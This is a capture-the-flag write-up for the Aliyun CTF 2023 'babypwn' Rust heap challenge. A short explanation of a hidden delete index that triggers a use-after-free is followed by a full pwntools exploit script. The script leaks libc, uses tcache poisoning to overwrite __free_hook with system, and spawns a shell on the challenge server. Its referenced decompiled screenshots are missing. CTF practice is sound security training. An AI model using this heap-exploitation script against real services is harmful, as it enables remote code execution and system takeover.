Aliyun CTF 2023 - babypwn - Writeup

A heap challenge written in Rust

Posted by l0tus on 2023-04-26

A menu-driven heap challenge written in Rust.
Very ugly.
Main function:



This is the ugliest pwn challenge I have ever done; ignore the very ugly parts of the code in the main function. What matters is one switch-case statement. Looking carefully at the function list on the left, you can see add, delete, show and edit, the menu, and a backdoor.

backdoor function:

delete function:


I won't go through the source; it is too ugly and I didn't read it carefully. A bit of poking around is enough to find the bug.
Approach:
When the delete function is called, entering the index 1953723762 reaches the backdoor function, which gives a UAF.
After that it is the usual leak the libc base -> tcache poisoning.
exp:

#!/usr/bin/python3
# -*- encoding: utf-8 -*-

from pwn import *

context.log_level = "debug"
context.arch = "amd64"

# p = process("./babyheap")

elf = ELF("./babyheap")
libc = ELF("./libc-2.27.so")

def add(size, content):
    # Menu option 1: allocate a chunk of `size` bytes and fill it with `content`
    p.sendlineafter(b">>> ", b"1")
    p.sendlineafter(b"idx is ", str(size).encode())
    p.sendafter(b"next the content: ", content)

def show(idx):
    # Menu option 2: print the contents of chunk `idx`
    p.sendlineafter(b">>> ", b"2")
    p.sendlineafter(b"house index: ", str(idx).encode())

def edit(idx, content):
    # Menu option 3: overwrite the first 8 bytes of chunk `idx`
    p.sendlineafter(b">>> ", b"3")
    p.sendlineafter(b"house index: ", str(idx).encode())
    p.sendafter(b"content(size 8): ", content)

def delete(idx):
    # Menu option 4: free chunk `idx` (index 1953723762 triggers the backdoor)
    p.sendlineafter(b">>> ", b"4")
    p.sendlineafter(b"house index: ", str(idx).encode())

p = remote("47.98.229.103", 1337)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)

delete(1)
delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)

delete(1953723762) # delete 0

show(0)

libc_base = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 0x3ebca0
log.info("libc_base: " + hex(libc_base))

add(0x8, b"b" * 0x8)

delete(1953723762) # delete 1

edit(1, p64(libc_base + libc.sym["__free_hook"]))

add(0x8, b"/bin/sh\x00")

# gdb.attach(p)

add(0x8, p64(libc_base + libc.sym["system"]))

delete(2)


p.interactive()
